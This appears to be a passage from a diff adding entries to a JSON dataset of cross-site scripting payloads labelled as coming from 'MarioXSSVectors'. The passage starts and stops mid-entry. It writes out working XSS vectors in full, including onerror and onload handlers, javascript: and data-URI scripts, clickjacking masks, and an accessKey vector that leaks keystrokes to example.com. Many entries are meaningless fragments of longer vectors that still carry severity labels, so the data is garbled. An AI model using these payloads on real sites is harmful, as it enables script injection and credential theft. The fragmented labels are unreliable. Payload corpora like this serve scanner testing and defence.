"type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<animation xlink:href=\"data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E\"/>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<image xlink:href=\"data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E\"/>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<foreignObject xlink:href=\"javascript:alert(88)\"/>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<foreignObject xlink:href=\"data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E\"/>", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"89\"><svg xmlns=\"http://www.w3.org/2000/svg\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<set attributeName=\"onmouseover\" to=\"alert(89)\"/>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<animate attributeName=\"onunload\" to=\"alert(89)\"/>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"90\"><!-- Up to Opera 10.63 -->", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div style=content:url(test2.svg)></div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!-- Up to Opera 11.64 - see link below -->", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!-- Up to Opera 12.x -->", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div style=\"background:url(test5.svg)\">PRESS ENTER</div>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"91\">[A]", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<? foo=\"><script>alert(91)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<! foo=\"><script>alert(91)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</ foo=\"><script>alert(91)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<? foo=\"><x foo='?><script>alert(91)</script>'>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<! foo=\"[[[x]]\"><x foo=\"]foo><script>alert(91)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<% foo><x foo=\"%><script>alert(91)</script>\">//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"92\"><div style=\"background:url(http://foo.f/f oo/;color:red/*/foo.jpg);\">X</div>//[\"'`-->]]>]</div><div id=\"93\"><div style=\"list-style:url(http://foo.f)\\20url(javascript:alert(93));\">X</div>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"94\"><svg xmlns=\"http://www.w3.org/2000/svg\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<handler xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\">alert(94)</handler>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"95\"><svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<feImage>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<set attributeName=\"xlink:href\" to=\"data:image/svg+xml;charset=utf-8;base64,", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D\"/>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</feImage>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"96\"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"97\"><!-- IE 5-9 -->", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=d><x xmlns=\"><iframe onload=alert(97)\"></div>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "event_attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<script>d.innerHTML+='';</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!-- IE 10 in IE5-9 Standards mode -->", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=d><x xmlns='\"><iframe onload=alert(2)//'></div>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "event_attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<script>d.innerHTML+='';</script>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"98\"><div id=d><div style=\"font-family:'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B'\">X</div></div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"99\">XXX<style>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!--", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</style>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"100\"><img[a][b]src=x[d]onerror[c]=[e]\"alert(100)\">//[\"'`-->]]>]</div><div id=\"101\"><a href=\"[a]java[b]script[c]:alert(101)\">XXX</a>//[\"'`-->]]>]</div><div id=\"102\"><img src=\"x` `<script>alert(102)</script>\"` `>//[\"'`-->]]>]</div><div id=\"103\"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"104\"><svg xmlns=\"http://www.w3.org/2000/svg\" id=\"foo\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<x xmlns=\"http://www.w3.org/2001/xml-events\" event=\"load\" observer=\"foo\" handler=\"data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar\"/>", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "event_attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"105\"><iframe src=\"data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03\"></iframe>//[\"'`-->]]>]</div><div id=\"106\"><img src onerror /\" '\"= alt=alert(106)//\">//[\"'`-->]]>]</div><div id=\"107\"><title onpropertychange=alert(107)></title><title title=></title>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"108\"><!-- IE 5-8 standards mode -->", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=xx:x onerror=alert(108)></a>\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!-- IE 5-9 standards mode -->", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(2)//\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<?a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(3)//\">//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"109\"><svg xmlns=\"http://www.w3.org/2000/svg\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<a id=\"x\"><rect fill=\"white\" width=\"1000\" height=\"1000\"/></a>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<rect fill=\"white\" style=\"clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);\"/>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"110\"><svg xmlns=\"http://www.w3.org/2000/svg\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<path d=\"M0,0\" style=\"marker-start:url(test4.svg#a)\"/>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"111\"><div style=\"background:url(/f#[a]oo/;color:red/*/foo.jpg);\">X</div>//[\"'`-->]]>]</div><div id=\"112\"><div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X</div>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"113\"><div id=\"x\">XXX</div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<style>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"114\"><x style=\"background:url('x[a];color:red;/*')\">XXX</x>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"115\"><!--[if]><script>alert(115)</script -->", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!--[if<img src=x onerror=alert(2)//]> -->//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"116\"><div id=\"x\">x</div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<xml:namespace prefix=\"t\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<import namespace=\"t\" implementation=\"#default#time2\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;\">//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"117\"><a href=\"http://attacker.org\">", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<iframe src=\"http://example.org/\"></iframe>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</a>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"118\"><div draggable=\"true\" ondragstart=\"event.dataTransfer.setData('text/plain','malicious code');\">", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<h1>Drop me</h1>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<iframe src=\"http://www.example.org/dropHere.html\"></iframe>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"120\"><script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "for (i=1;i<6;i++) {", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</script>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<body>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<a href=\"#\" onclick=\"makePopups()\">Spam</a>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"121\"><html xmlns=\"http://www.w3.org/1999/xhtml\"", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<body style=\"background:gray\">", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<iframe src=\"http://example.com/\" style=\"width:800px; height:350px; border:none; mask: url(#maskForClickjacking);\"/>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<svg:svg>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</svg:mask>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</svg:svg>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</body>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"122\"><iframe sandbox=\"allow-same-origin allow-forms allow-scripts\" src=\"http://example.org/\"></iframe>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"123\"><span class=foo>Some text</span>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<a class=bar href=\"http://www.example.org\">www.example.org</a>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<script src=\"http://code.jquery.com/jquery-1.4.4.js\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "alert('foo');", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "alert('bar');", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</script>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"124\"><script src=\"/\\example.com\\foo.js\"></script> // Safari 5.0, Chrome 9, 10", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<script src=\"\\\\example.com\\foo.js\"></script> // Safari 5.0//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"125\"><?xml version=\"1.0\"?>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<?xml-stylesheet type=\"text/xml\" href=\"#stylesheet\"?>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!DOCTYPE doc [", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!ATTLIST xsl:stylesheet", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "id ID #REQUIRED>]>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<svg xmlns=\"http://www.w3.org/2000/svg\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<xsl:stylesheet id=\"stylesheet\" version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<xsl:template match=\"/\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<iframe xmlns=\"http://www.w3.org/1999/xhtml\" src=\"javascript:alert(125)\"></iframe>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</xsl:template>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</xsl:stylesheet>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<circle fill=\"red\" r=\"40\"></circle>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"126\"><object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"alert(126)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"127\"><svg xmlns=\"http://www.w3.org/2000/svg\" id=\"x\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<listener event=\"load\" handler=\"#y\" xmlns=\"http://www.w3.org/2001/xml-events\" observer=\"x\"/>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<handler id=\"y\">alert(127)</handler>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"128\"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"129\"><svg>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<image style='filter:url(\"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>\")'>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<image filter='...'>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"130\"><math href=\"javascript:alert(130)\">CLICKME</math>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<math>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!-- up to FF 13 -->", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(2)\">CLICKME</maction>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!-- FF 14+ -->", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<maction actiontype=\"statusline\" xlink:href=\"javascript:alert(3)\">CLICKME<mtext>http://http://google.com</mtext></maction>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</math>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<br/><hr/>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"dropbox\" style=\"height: 360px;width: 500px;border: 5px solid #000;position: relative;\" ondragover=\"event.preventDefault()\">+ Drop Box +</div>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"132\"><!doctype html>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<form>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<br>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<input name=\"secret\" type=\"password\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</form>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!-- injection --><svg height=\"50px\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<image xmlns:xlink=\"http://www.w3.org/1999/xlink\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<set attributeName=\"xlink:href\" begin=\"accessKey(a)\" to=\"//example.com/?a\" />", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<set attributeName=\"xlink:href\" begin=\"accessKey(b)\" to=\"//example.com/?b\" />", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<set attributeName=\"xlink:href\" begin=\"accessKey(c)\" to=\"//example.com/?c\" />", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<set attributeName=\"xlink:href\" begin=\"accessKey(d)\" to=\"//example.com/?d\" />", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</image>", + "category": "xss", + "metadata": { + "type": "generic", + "context": 